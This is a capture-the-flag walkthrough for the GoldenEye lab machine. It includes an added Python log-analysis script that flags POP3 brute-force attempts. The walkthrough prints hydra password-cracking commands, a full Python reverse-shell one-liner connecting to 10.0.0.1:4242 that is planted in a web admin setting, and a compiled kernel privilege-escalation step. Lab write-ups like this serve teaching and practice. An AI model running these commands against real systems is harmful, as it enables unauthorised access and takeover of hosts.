GoldenEye CTF

Hacer Dalkiran
5 min read · Apr 17, 2024

This room covers the POP3 service, a reverse shell, and privilege escalation using a known exploit. Let's start with a quick scan. We scan all ports with the -p- switch and speed the scan up with the -T4 switch.

nmap -p- -T4 10.10.193.235

Ports 25 and 80 are open among the top 1000 ports.

Ports 55006 and 55007 are also open, and they are used for POP3 services.

Use nmap to scan the network for all ports. How many ports are open?

4

There is a web page. Let's run a gobuster scan. While the scan runs, let's investigate the page manually.

Right-click and choose "view page source"; we reach some JavaScript code.

The terminal.js file might be important.

Here we go!

Who needs to make sure they update their default password?

Boris

There is an encoded phrase. Let's decode it using Burp's decoder.

We choose HTML decode and decode the phrase.

Navigate to the /sev-home directory. This page is protected by basic authentication.

I try Boris with the found password. This is false. I try admin, Admin, and boris.

"boris" works. There is not much here, but we get the names Natalya and Boris and the POP3 service. Most probably, we will use this information.

TASK 2

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?

hydra -l Boris -P /usr/share/wordlists/fasttrack.txt 10.10.193.235 -s 55007 pop3

Let's connect to the target using netcat with the following commands:

nc <TARGET_IP_ADDRESS> 55007
USER Boris
PASS S******

Let's list all the emails with the LIST command.

We can retrieve each mail with the RETR command followed by its index number, as shown below.

Let's look at Natalya's mails. First, we need her password.

We can crack it with hydra again.

Let's get her email messages by connecting to the mail server with netcat.

We get new user credentials and information about a hidden directory.
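The two hydra runs above (against Boris and then Natalya), seen from the mail server's side, as an added example that is not part of the original write-up: it parses constructed Dovecot-style POP3 login log lines (the source IPs, timestamps and user names are made up) and flags any source that piles up authentication failures in a short window, noting whether a successful login followed the burst, which is what a cracked password looks like in the log.

```python
# Added example, not from the original write-up: spotting a POP3 password-guessing
# burst in mail-server logs.  SAMPLE_LOG is constructed in Dovecot's log style;
# 192.0.2.10 / 192.0.2.77 are made-up source addresses.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

_FAIL = ("Apr 17 10:01:{:02d} mail dovecot: pop3-login: Disconnected (auth failed, 1 attempts "
         "in 2 secs): user=<{}>, method=PLAIN, rip={}, lip=10.10.193.235")
_OK = ("Apr 17 10:01:{:02d} mail dovecot: pop3-login: Login: user=<{}>, method=PLAIN, "
       "rip={}, lip=10.10.193.235")
SAMPLE_LOG = "\n".join(
    [_FAIL.format(s, "boris", "192.0.2.10") for s in range(1, 9)]  # 8 failures in 8 seconds
    + [_OK.format(9, "boris", "192.0.2.10"),                       # then a success: cracked
       _FAIL.format(30, "natalya", "192.0.2.77"),                   # a single typo-style failure
       _OK.format(31, "natalya", "192.0.2.77")])                    # normal user login

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?rip=(?P<rip>[\d.]+)")

def parse(log, year=2024):
    """Yield (timestamp, success, user, source_ip) for every pop3-login line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["event"] == "Login", m["user"], m["rip"]

def find_bruteforce(log, threshold=5, window=timedelta(minutes=1)):
    """Return {source_ip: (failures_in_window, login_after_burst)} for sources
    that reach `threshold` failed logins inside a sliding `window`."""
    recent = defaultdict(deque)   # source_ip -> timestamps of recent failures
    hits = {}
    for ts, ok, _user, rip in parse(log):
        if not ok:
            q = recent[rip]
            q.append(ts)
            while q and ts - q[0] > window:   # forget failures outside the window
                q.popleft()
            if len(q) >= threshold:
                hits[rip] = (len(q), hits.get(rip, (0, False))[1])
        elif rip in hits:
            hits[rip] = (hits[rip][0], True)  # success right after a burst
    return hits

if __name__ == "__main__":
    for rip, (n, cracked) in find_bruteforce(SAMPLE_LOG).items():
        print(f"{rip}: {n} failed POP3 logins in window, login afterwards: {cracked}")
```

A real deployment would read the journal or /var/log/mail.log instead of SAMPLE_LOG and pick the threshold from the site's normal failure rate.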

TASK 3

Let's edit the /etc/hosts file with the nano text editor:

<machines ip> severnaya-station.com

And go to

severnaya-station.com/gnocertdir

and log in with the xenia user and password. Let's move through the tabs. There is an interesting message on the messages tab, where we see a new name: dr doak.

Let's try to crack his password again with hydra:

We got doak's password. Let's connect to the mail server.

We got web credentials:

Let's go to "http://severnaya-station.com/gnocertdir" with these credentials.

I reach a secret file on the "my private files" tab.

Let's download this file. It points to a directory location.

Let's go there and download the jpg file.

I try stegcracker too, but it doesn't work. Simply put, the info is in the EXIF data. We can use the strings command.

There is some encoded info. Let's decode it with CyberChef. Here we go!

We reach another password.

We can try this password on the POP3 connection or on the web page.

Username : Admin

Password : this_password

Yess!

Go to "Site Administration > Server > System Paths".

There is a code area. We can inject reverse shell code here.

I use the Python reverse shell from the following link:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Then, let's edit the text editors from the plugins tab.

Attention! I have tried more than one reverse shell code. I got the shell with the code above.

We need to trigger this script. But first, let's start listening on this port.

I add a file and click the spellcheck button.

Okay! We got the shell.

I fetch the recommended code on my machine. Using Python, I start a web server. Using the wget command, I send this code to the target.

Then run the command with the output saved to enum.txt.

I can use those commands. The recommended exploit is a C file, so we can use cc instead of gcc.

I send the C code to the target. However, when I run the code, I get the following error.

Thus, I go back to the original code and change the following line:

When I run the exploit with:

cc ofs.c -o ofs
./ofs

I became root.
